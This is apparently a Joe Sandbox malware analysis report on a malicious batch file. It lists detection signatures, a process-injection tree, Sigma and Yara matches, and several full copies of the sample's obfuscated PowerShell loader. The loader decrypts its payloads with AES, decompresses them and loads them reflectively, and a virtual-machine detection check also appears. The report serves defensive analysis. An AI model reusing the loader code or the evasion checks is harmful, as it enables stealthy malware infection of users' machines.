Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.bat

Overview

General Information

Sample name:x.bat
Analysis ID:1574678
MD5:3839596a3f33711abce263e7d890b2e9
SHA1:185a35a99a20422843725342c374ebae76b76fdc
SHA256:ac0c9ad2975e52b69068d331e25c0f7e1aaa2976651794b1eeadf5a3529bcaf0
Tags:batuser-lontze7
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5752 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 1852 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 3592 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3524 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dllhost.exe (PID: 5016 cmdline: C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 412 cmdline: C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 6756 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6996 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 6072 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 1368 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4544 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • schtasks.exe (PID: 6816 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • IfMUlU.exe (PID: 6964 cmdline: "C:\Windows\$nya-onimai2\IfMUlU.exe" MD5: B943A57BDF1BBD9C33AB0D33FF885983)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4544INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x51405:$b2: ::FromBase64String(
  • 0x51463:$b2: ::FromBase64String(
  • 0xc2676:$b2: ::FromBase64String(
  • 0xc305d:$b2: ::FromBase64String(
  • 0xe5675:$b2: ::FromBase64String(
  • 0xfc3b:$s1: -join
  • 0x1205a:$s1: -join
  • 0x4b9fe:$s1: -join
  • 0x506e9:$s3: Reverse
  • 0xcad49:$s3: Reverse
  • 0xbe99:$s4: +=
  • 0xbeb8:$s4: +=
  • 0xbef3:$s4: +=
  • 0xbf10:$s4: +=
  • 0xbf4b:$s4: +=
  • 0xbfb7:$s4: +=
  • 0xc043:$s4: +=
  • 0xc151:$s4: +=
  • 0xde84:$s4: +=
  • 0xdea7:$s4: +=
  • 0x13316:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); , CommandLine: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4544, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 6816, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); , CommandLine: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4544, TargetFilename: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5016, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2084, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3524, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
Source: C:\Windows\$nya-onimai2\IfMUlU.exeJoe Sandbox ML: detected
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
